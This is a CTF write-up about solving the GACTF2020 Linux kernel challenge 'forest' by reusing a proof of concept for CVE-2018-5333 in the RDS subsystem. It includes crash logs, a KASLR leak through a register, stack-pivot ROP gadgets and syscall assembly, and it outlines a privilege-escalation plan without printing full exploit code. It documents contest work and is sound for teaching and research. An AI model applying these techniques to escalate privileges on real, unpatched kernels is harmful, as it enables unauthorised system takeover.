Don't Share Your Code
the code above has nothing to do with programing, the password instead

Adopting CVE knowledge to exploit CTF kernel challenges

In this post, I will introduce one kernel CTF challenge, which is the first one I actually solved in an real contest with my teammate. Moreover, the experience I accumulated during reproducing old CVE did a great favour in solving this challenge and help us get the first blood.

In fact, only our team solve out this problem. The reason for that may be the mistake from the content orgranizer.

A view of the challenge

This challenge, forest, comes from the GACTF2020, released to our players late in the first night. After decompressing the attachment, you will see below files.

$ unzip
  inflating: forest.diff
  inflating: bzImage
  inflating: rootfs.img

Launching the kernel with the, you will get following results. We also leant that protections like SMEP and KASLR are enabled.

$ cat

qemu-system-x86_64 \
    -m 64 \
	-cpu qemu64,+smep,-smap \
	-kernel bzImage \
	-initrd rootfs.img \
	-nographic \
    -no-reboot \
	-append "root=/dev/sda rw console=ttyS0 quiet kaslr" \
	-monitor /dev/null \
    -smp 2 \
    -sandbox on #,obsolete=deny,elevateprivileges=deny,spawn=deny,resourcecontrol=deny
$ ./
qemu-system-x86_64: warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5]
qemu-system-x86_64: warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5]
Boot took 2.41 seconds
/ $ uname -a
Linux (none) 5.6.9+ #18 SMP Mon Jun 15 00:34:52 CST 2020 x86_64 GNU/Linux

As you may wonder, one file is named as forest.diff. Okay, it seems this challenge not only installing a vulnerable module but also patching the kernel to introduce the vulnerability.

$ cat forest.diff
diff --git  net/rds/rdma.c

@@ void rds_atomic_free_op(struct rm_atomic_op *ao)
	struct page *page = sg_page(ao->op_sg);

	/* Mark page dirty if it was possibly modified, which
	 * is the case for a RDMA_READ which copies from remote
	 * to local memory */
	unpin_user_pages_dirty_lock(&page, 1, true);

	ao->op_notifier = NULL;
-	ao->op_active = 0;

This werid function, rds_atomic_free_op, is patched. The line of ao->op_active = 0 is deleted. Well, we can image that this patch may lead to some use-after-free vulnerability. This function possibly is used to free some objects. When the ao->op_active is not cleaned, some other operations may be allowed to utilize this released object.

Cool, we have some clues in hand now, what’s the next step? Looking up the kernel source code (version 5.6.9) to find out primitives? The sad thing is that the Linux network stack is too complex and unfriendly for a newbie.

A funny shot

The ao->op_active, at the first glance, reminds me of the CVE-2018-5333, one old CVE I have learnt and reproduced in previous. Hence, I have the POC code to result in the crash. Why not give it a shot?

Amazing thing happens, the kernel gives out crash information when dereferening the poisoned address 0x4444444444444444.

[    5.341489] general protection fault, probably for non-canonical address 0x4444444444444444: 0000 [#1] SMP NOPTI
[    5.341735] CPU: 1 PID: 122 Comm: poc Tainted: G           O      5.6.9+ #18
[    5.341735] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[    5.341735] RIP: 0010:set_page_dirty+0x21/0xa0
[    5.341735] Code: 2e 0f 1f 84 00 00 00 00 00 53 48 89 fb e8 97 3a 01 00 48 8b 53 08 48 8d 4a ff 83 e2 01 48 0f 45 d9 48 85 c0 74 4d 48 8b 4b 08 <48> 8b 40 70 48 8d 51 ff 83 e1 01 48 8b 40 18 48 0f 44 d3 48 8b 12
[    5.341735] RSP: 0018:ffffba8c801f3b10 EFLAGS: 00000206
[    5.341735] RAX: 4444444444444444 RBX: 0000000000000000 RCX: 4444444444444444
[    5.341735] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[    5.341735] RBP: ffffba8c801f3b58 R08: ffff9b434351f740 R09: 00000007ffd4d61b
[    5.341735] R10: ffff9b43439541f8 R11: 0000000000000001 R12: ffffba8c801f3b60
[    5.341735] R13: 0000000000000000 R14: ffff9b43439540e8 R15: 0000000000000246
[    5.341735] FS:  00000000026b4880(0000) GS:ffff9b4343900000(0000) knlGS:0000000000000000
[    5.341735] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    5.341735] CR2: 0000000000000000 CR3: 000000000394e000 CR4: 00000000001006e0
[    5.341735] Call Trace:
[    5.341735]  set_page_dirty_lock+0x29/0x50
[    5.341735]  unpin_user_pages_dirty_lock+0x6f/0xb0
[    5.341735]  rds_atomic_free_op+0x39/0x70
[    5.341735]  rds_message_put+0x2e2/0x370
[    5.341735]  rds_sendmsg+0x290/0x1130
[    5.341735]  ? check_preempt_wakeup+0x10d/0x190
[    5.341735]  ? sock_sendmsg+0x56/0x60
[    5.341735]  sock_sendmsg+0x56/0x60
[    5.341735]  ____sys_sendmsg+0x1fb/0x280
[    5.341735]  ___sys_sendmsg+0x83/0xd0
[    5.341735]  ? _raw_spin_unlock_irqrestore+0x5/0x10
[    5.341735]  ? __wake_up_common_lock+0x82/0xb0
[    5.341735]  ? __sys_sendmsg+0x59/0xa0
[    5.341735]  __sys_sendmsg+0x59/0xa0
[    5.341735]  do_syscall_64+0x43/0x160
[    5.341735]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[    5.341735] RIP: 0033:0x44a389
[    5.341735] Code: 00 b8 00 01 00 00 eb e1 e8 54 1a 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48
[    5.341735] RSP: 002b:00007ffd8d933fb8 EFLAGS: 00000202 ORIG_RAX: 000000000000002e
[    5.341735] RAX: ffffffffffffffda RBX: 0000000000400400 RCX: 000000000044a389
[    5.341735] RDX: 0000000000000000 RSI: 00007ffd8d933fd0 RDI: 0000000000000003
[    5.341735] RBP: 00007ffd8d935040 R08: 0000000000000000 R09: 0000000300000000
[    5.341735] R10: 00000000026b4880 R11: 0000000000000202 R12: 0000000000401bd0
[    5.341735] R13: 0000000000000000 R14: 00000000006ba018 R15: 0000000000000000
[    5.341735] Modules linked in: forest(O)
[    5.354346] ---[ end trace ef5e047d4433cb92 ]---
[    5.354576] RIP: 0010:set_page_dirty+0x21/0xa0

Well, does this means that the original exploit idea can be ported to this one?

In fact, the root cause of this CVE is that the fail path of function rds_cmsg_atomic() forget to clean the atomic.op_active after unpining the user page and freeing the op_notifier object. Therefore, when the function logic enters below, error control flow takes place.

 * This relies on dma_map_sg() not touching sg[].page during merging.
static void rds_message_purge(struct rds_message *rm)
	unsigned long i;
/* ... */
	if (rm->atomic.op_active)
/* ... */

This time, the function rds_atomic_free_op forgets to clean the rm->atomic.op_active. So there should be critical difference between the CVE and this challenge. However, why old POC triggers the crash here?

During the contest, we didn’t get to deeper to seek out the reason. We just follow the crash to write doable exploit. After the whole game is over, I started to reverse the kernel image to find the reason.

The sad and unexpected thing is that I found this kernel image dismatch the description of the forest.diff file.


As you can see, the code that is free of the CVE-2018-5333 should be like

	if (page)
	rm->atomic.op_active = 0;   // The most important patch

	return ret;

However, the result given by IDA demonstrates that this patch is unrolled by the challenge maker. The CVE-2018-5333 is re-introduced into the kernel without any notification.

Moreover, by reversing the rds_atomic_free_op function you will find that the forest.diff is failed to insert…. This is quite misleading and I bet other teams failed to solve out this challenge due to this huge mistake: maybe the wrong kernel is used or the wrong diff file is released.

No matter what, during the competition, the target of players is to obtain the flag rather than battling with the organizer. With cash in hand, we start to build the exploit code.

Build exploit

Though I have already reproduced this CVE previously, the exploit I wrote cannot be used to get the flag. As the KASLR and SMEP is adopted. That is, we have to leak some kernel address first and try kernel ROP then.

Don’t forget these is one vulnerable kernel module that we can use. I guess the purpose of it is to help us leak some addresses. However, due to the mistakes the orgranizers have made. We can directly get information from the crashes (unexpected leaking solution maybe).

After that, we will get the correct offset to accessing these two important functinos. Just like the old exploit, we will try to hijack the code pointer of mapping->a_ops->set_page_dirty to manipulate the control flow. You can refer to my old post.

The problems we have is how to bypass the protections. The expected steps are listed:

  1. Operate on kernel module (forest.ko) to leak base address.
  2. Construct ROP chain to escalate the priviledge
  3. Launch shell

According to the offical writeup, the kernel module is supplied to serve for KASLR. As the author said, the original CVE vulnerability does no help to bypassing KASLR.

Spoil Alert

The fact is, only adopting NULL pointer dereference of course cannot bypass KASLR. However, after mapping a buffer to prevent this crash and hijack the mapping->a_ops->set_page_dirty to any invalid pointer. That crash gives us a present.

.text:FFFFFFFF81170FE3 loc_FFFFFFFF81170FE3:                   ; CODE XREF: set_page_dirty+3D↑j
.text:FFFFFFFF81170FE3                 test    rax, rax
.text:FFFFFFFF81170FE6                 mov     rdx, offset __set_page_dirty_buffers
.text:FFFFFFFF81170FED                 mov     rdi, rbx
.text:FFFFFFFF81170FF0                 pop     rbx
.text:FFFFFFFF81170FF1                 cmovz   rax, rdx
.text:FFFFFFFF81170FF5                 jmp     __x86_indirect_thunk_rax

The function set_page_dirty, as you see, assign function pointer __set_page_dirty_buffers to register rdx. When this indirected jump triggers the crash, we can leak the address from rdx like below.

[    6.947347] RIP: 0010:0xdeadbeaf
[    6.947347] Code: Bad RIP value.
[    6.947347] RSP: 0018:ffffc90000257b18 EFLAGS: 00000206
[    6.947347] RAX: 00000000deadbeaf RBX: 0000000000000000 RCX: 0000000000000000
[    6.947347] RDX: ffffffff81216d80 RSI: 0000000000000001 RDI: 0000000000000000
[    6.947347] RBP: ffffc90000257b58 R08: ffff888003aad540 R09: 00000007fff5704e
[    6.947347] R10: ffff888003b685f8 R11: 0000000000000001 R12: ffffc90000257b60
[    6.947347] R13: 0000000000000000 R14: ffff888003b684e8 R15: 0000000000000246
[    6.947347] FS:  0000000001da2880(0000) GS:ffff888003500000(0000) knlGS:0000000000000000

The remaining work is just straightforward. However, some interesting things need to be mentioned.

stack pivoting

There are two very useful gadgets to hijack the stack pointer into user-controlled memory.

# 1
xchg eax, esp ; ret
# 2
mov esp, 0x5b000000; pop rbp; ret;

These two gadges all focus on modifying esp. The point here is that when you write the lower 32-bits value of the rsp register, the upper 32-bits will be cleaned to zero.

syscall wrapper

Be careful, when you write your own code to execute syscall assembly, you cannot behave as original userspace code. The entire wrapper code doesn’t use $rcx register but directly use r10 register. I waste a lot of time here.

    movq %rdi, %rax                /* Syscall number -> rax.  */
    movq %rsi, %rdi                /* shift arg1 - arg5.  */
    movq %rdx, %rsi
    movq %rcx, %rdx
    movq %r8, %r10
    movq %r9, %r8
    movq 8(%rsp),%r9               /* arg6 is on the stack.  */
    syscall                        /* Do the system call.  */


This post aim to introduce the buggy experience I faced with my teammates. In another word, reproducing CVEs actually do some help in CVE, isn’t it? :)